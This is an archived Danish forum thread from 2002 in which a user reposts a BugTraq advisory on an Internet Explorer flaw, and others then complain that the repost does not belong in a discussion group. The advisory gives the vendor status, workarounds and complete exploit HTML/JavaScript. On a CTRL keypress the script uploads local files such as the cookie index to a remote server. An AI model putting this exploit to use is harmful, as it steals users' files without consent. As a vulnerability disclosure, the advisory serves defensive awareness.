/ Forside / Teknologi / Internet / Sikkerhed / Nyhedsindlæg
Login
Glemt dit kodeord?
Brugernavn

Kodeord


Reklame
Top 10 brugere
Sikkerhed
#NavnPoint
stl_s 37026
arlet 26827
miritdk 20260
o.v.n. 12167
als 8951
refi 8694
tedd 8272
BjarneD 7338
Klaudi 7257
10  molokyle 6481
Pressing CTRL in IE is dangerous
Fra : Jens M


Dato : 24-07-02 08:12

Hej Alle,

Følgende er taget fra BugTraq, jeg ved ikke om I kender til exploiten,
om ikke andet, så gør i nu =)

-- CnP from BugTraq Begin


- Sandblad advisory #8 -

---..---..---..---..---..---..---..---..---..---..---..---..----
Title: Pressing CTRL in IE is dangerous
Date: [2002-07-23]
Software: Internet Explorer
Impact: Pressing CTRL in IE may result in arbitrary local
file to be uploaded to a remote server (no exact
path needed). If special sensitive information is
uploaded, it may be used to run remote programs.
Vendor: http://www.microsoft.com/ _ _
Patch: none o' \,=./ `o
Author: Andreas Sandblad, sandblad@acc.umu.se (o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---


VENDOR STATUS:
==============

02-06-16
Microsoft was contacted about the issue.

02-07-23
Microsoft sent the following statement:
"After investigation, our product team has confirmed that this does
not
meet the bar of a security vulnerability. We will not be releasing a
hotfix or patch for this issue."
They proposed the following possible workarounds:
1. disable or set to prompt - "Submit nonencrypted form data" option
2. disable "allow paste operations via script" (best)
3. disable active scripting


DESCRIPTION:
============

A special crafted webpage can retrieve any local file using simple
javascript. This is possible by performing the following steps:

1. When an user presses the CTRL key an onkeydown event can be set to
fire. In the event function the key pressed is changed to 'V'. The
result
will be a paste operation with less restrictions.

2. The content of the clipboard is altered and focus is changed to a
hidden file upload form. The paste operation will be performed into
the
form, yielding a change of value for the file upload field (not
normally
allowed).

3. The upload form is submited automaticly (legal javascript
operation).

It isn't necessary to know the exact path to local files because it's
possible to refer to a file with "..\filename".

Further on, if the local file
"..\LOCALS~1\TEMPOR~1\CONTENT.IE5\index.dat"
is uploaded, then the random directories needed to get the exact path
to
the temporarily internet folders can be retrieved. Knowing the exact
path
a compiled help file .chm can be dumped and launched with showHelp()
(old
..chm attack). The compiled help file is allowed to have instructions
to
execute arbitrary programs.


EXPLOIT:
========

Instructions:
Put the html code in a remote html document and load it with Internet
Explorer. Activate the exploit by pressing CTRL. You must prepare a
server
side script to take care of the upload process ("upload.php"). If you
choose to use php I recommend
http://www.php.net/manual/en/features.file-upload.php
as a reference on how to setup a server side script taking care of a
file
upload.

Note:
1. Please remove all "!" characters in the exploit code. They have
been
inserted to decrease false virus alarms triggered by this mail.
2. Default settings are assumed.

Exploit:
-------------------------- CUT HERE -------------------------------
<!div id=h style="zoom:0.0001">
<!form name=u enctype="multipart/form-data" method=post
action=upload.php>
<!input type=file name=file></form></div>
<!script>
//uploadFile="..\\LOCALS~1\\TEMPOR~1\\CONTENT.IE5\\index.dat";
uploadFile="..\\Cookies\\index.dat";
function gotKey(){
if (!event.ctrlKey) return;
document.onkeydown = null;
event.keyCode = 86;
window.clipboardData.setData("Text",uploadFile);
(p=document.forms.u.file).focus();
p.onpropertychange = function(){document.forms.u.submit()};
} document.onkeydown = gotKey;
window.onload=function(){document.body.focus()};
<!/script>
-------------------------- CUT HERE -------------------------------


Disclaimer:
===========
Andreas Sandblad is not responsible for the misuse of the
information provided in this advisory. The opinions expressed
are my own and not of any company. In no event shall the author
be liable for any damages whatsoever arising out of or in
connection with the use or spread of this advisory. Any use of
the information is at the user's own risk.


Old advisories:
===============
#7 [2002-05-19] "IE dot bug"
http://online.securityfocus.com/archive/1/273168
#6 [2002-05-15] "Opera javascript protocoll vulnerability"
http://online.securityfocus.com/archive/1/272583
#5 [2002-04-26] "Mp3 file can execute code in Winamp."
http://online.securityfocus.com/archive/1/269724
#4 [2002-04-15] "Using the backbutton in IE is dangerous."
http://online.securityfocus.com/archive/1/267561

CnP from BugTraq End --

--
Jens

 
 
Alex Holst (24-07-2002)
Kommentar
Fra : Alex Holst


Dato : 24-07-02 11:38

Jens M <jens@xhaboo.dk> wrote:
> Hej Alle,
>
> Følgende er taget fra BugTraq, jeg ved ikke om I kender til exploiten,
> om ikke andet, så gør i nu =)

Protest. Skal vi nu til at foere det samme indhold som bugtraq,
vuln-dev, secureprograms, etc? Det synes jeg ikke. Det maa vaere op til
folk selv at modtage relevant sikkerhedsinformation, og det boer ikke
ske i et *diskussionsforum* som dette.

Naar det er sagt, skal der selvfoelgelig vaere plads til at diskutere
ovenstaaende, men det synes jeg ikke du lagde op til i dit "look, mom!
look! i got the first forward!" indlaeg.

--
I prefer the dark of the night, after midnight and before four-thirty,
when it's more bare, more hollow. http://a.mongers.org

Flemming Riis (24-07-2002)
Kommentar
Fra : Flemming Riis


Dato : 24-07-02 11:59

"Alex Holst" <a@mongers.org> wrote in message
news:3d3e83a0$0$11820$edfadb0f@dspool01.news.tele.dk

> > Følgende er taget fra BugTraq, jeg ved ikke om I kender til exploiten,
> > om ikke andet, så gør i nu =)
>
> Protest. Skal vi nu til at foere det samme indhold som bugtraq,
> vuln-dev, secureprograms, etc? Det synes jeg ikke. Det maa vaere op til
> folk selv at modtage relevant sikkerhedsinformation, og det boer ikke
> ske i et *diskussionsforum* som dette.

Helst ikke , specialt da de fleste broadcast herinde er flere dage gamle (af
dem jeg har set )

> Naar det er sagt, skal der selvfoelgelig vaere plads til at diskutere
> ovenstaaende, men det synes jeg ikke du lagde op til i dit "look, mom!
> look! i got the first forward!" indlaeg.

Det er ikke noget galt i at snakke om en post så er det jo bare at linke til
org ref og tage den derfra.

Tror de fleste herinde følger de sec lister de har behov for så extra kopier
er i bedste fald spild af båndbredde



Jens M (25-07-2002)
Kommentar
Fra : Jens M


Dato : 25-07-02 10:35

"Flemming Riis" <flemming@riis.nu> wrote in message news:<3d3e8826$0$10677$4d4eb98e@news.dk.uu.net>...

[SNIP]

> Det er ikke noget galt i at snakke om en post så er det jo bare at linke til
> org ref og tage den derfra.

Godt ord igen, jeg kan godt se nu at jeg måske i stedet skulle have
pastet linket til bugTraq i stedet for hele teksten.. Sorry, jeg
begrænser mine posts i fremtiden =)
>
> Tror de fleste herinde følger de sec lister de har behov for så extra kopier
> er i bedste fald spild af båndbredde

Det har ikke altid været tilfældet.


--
Jens

Christian E. Lysel (25-07-2002)
Kommentar
Fra : Christian E. Lysel


Dato : 25-07-02 11:26

Jens M wrote:
>>Tror de fleste herinde følger de sec lister de har behov for så extra kopier
>>er i bedste fald spild af båndbredde
> Det har ikke altid været tilfældet.

Men hvad er der så specielt ved det hul, i forhold til de andre?


Bo Simonsen (26-07-2002)
Kommentar
Fra : Bo Simonsen


Dato : 26-07-02 14:21

In article <4f49b2e4.0207250135.ec4e87d@posting.google.com>, Jens M wrote:

> Godt ord igen, jeg kan godt se nu at jeg måske i stedet skulle have
> pastet linket til bugTraq i stedet for hele teksten.. Sorry, jeg
> begrænser mine posts i fremtiden =)

En af grundene til at din post er irrelavant, er at det ikke er os alle
herinde der benytter Windows. Prøv evt. og kik i headers i posts, der
burde du nok kunne finde en del 'slrn x.x.x.x
(Linux/FreeBSD/OpenBSD/SunOS, etc).

Og som Alex sagde at det er et diskusionsforum og ikke en security-mailingliste.

--
Med venlig hilsen
Bo Simonsen

http://fido.geekworld.dk

rea721 (28-07-2002)
Kommentar
Fra : rea721


Dato : 28-07-02 21:34

"Bo Simonsen" <paltas@geekworld.dk> skrev

> En af grundene til at din post er irrelavant, er at det ikke er os alle
> herinde der benytter Windows. Prøv evt. og kik i headers i posts, der
> burde du nok kunne finde en del 'slrn x.x.x.x
> (Linux/FreeBSD/OpenBSD/SunOS, etc).

Det er da en fuldstændig irrelevant grund...styrresystemet har ikke
indflydelse på relevansen af postingen. Desuden behøver man ikke poste i
gruppen for at ha interresse i sikkerhed.

> Og som Alex sagde at det er et diskusionsforum og ikke en
security-mailingliste.

Den her grund er til gændgæld glimragende.

--
Rea721 AKA Leon Andrea rea721@fabel.dk
Bevar Eskadrille 721 på Flyvestation Værløse
Den sidste operative Flyvestation på Sjælland.


Søg
Reklame
Statistik
Spørgsmål : 177558
Tips : 31968
Nyheder : 719565
Indlæg : 6408929
Brugere : 218888

Månedens bedste
Årets bedste
Sidste års bedste